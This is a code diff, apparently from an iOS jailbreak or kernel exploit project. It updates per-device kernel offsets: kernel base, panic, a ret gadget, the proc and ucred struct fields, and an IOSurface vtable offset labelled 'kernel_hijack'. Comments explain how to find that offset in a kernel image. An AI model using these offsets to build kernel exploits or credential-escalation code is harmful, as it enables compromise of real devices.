+    g_offsets.struct_proc_p_uthlist = 0x98;
+    
+    g_offsets.struct_uthread_uu_ucred = 0x168;
+    
+    g_offsets.struct_uthread_uu_list = 0x170;
+    
+    /*
+    	IOSurface->lockSurface
+    	Find "H264IOSurfaceBuf ERROR: lockSurface failed."
+    	Both strings have BLR X8 above them.
+    	Find the nearest LDR X8, [something, OFFSET].
+    	The OFFSET is mostly 0x98. If something else, then change this.
+     */
+    g_offsets.iosurface_vtable_offset_kernel_hijack = 0x98;
+}
+
+void init_RELEASE_ARM64_T7001_1630() {
+    
+    g_offsets.kernel_base = 0xFFFFFFF0060CC000;
+    
+    /* Vtable address of IOSurface */
+    
+    g_offsets.iofence_vtable_offset = 0xFFFFFFF006EF4B08 - g_offsets.kernel_base;
     
     g_offsets.panic = 0xFFFFFFF0070B6DD0 - g_offsets.kernel_base;
     
@@ -180,28 +204,6 @@ void init_RELEASE_ARM64_T7001_1630() {
     g_offsets.sysctl_hw_family = 0xFFFFFFF00753A678 - g_offsets.kernel_base;
     
     g_offsets.ret_gadget = 0xFFFFFFF0070B55B8 - g_offsets.kernel_base;
-    
-    g_offsets.struct_proc_p_comm = 0x26C;
-    
-    g_offsets.struct_proc_p_ucred = 0x100;
-    
-    g_offsets.struct_kauth_cred_cr_ref = 0x10;
-    
-    g_offsets.struct_proc_p_uthlist = 0x98;
-    
-    g_offsets.struct_uthread_uu_ucred = 0x168;
-    
-    g_offsets.struct_uthread_uu_list = 0x170;
-    
-    /*
-    	IOSurface->lockSurface
-    	Find "H264IOSurfaceBuf ERROR: lockSurface failed."
-    	Both strings have BLR X8 above them.
-    	Find the nearest LDR X8, [something, OFFSET].
-    	The OFFSET is mostly 0x98. If something else, then change this.
-     */
-    g_offsets.iosurface_vtable_offset_kernel_hijack = 0x98;
-    
 }
 
 /*
@@ -381,4 +383,3 @@ kern_return_t offsets_init() {
 cleanup:
     return ret;
 }
-


### PR DESCRIPTION
update 25.08:
the smaller offsets have to be extracted for each kernel, i will upload the new list later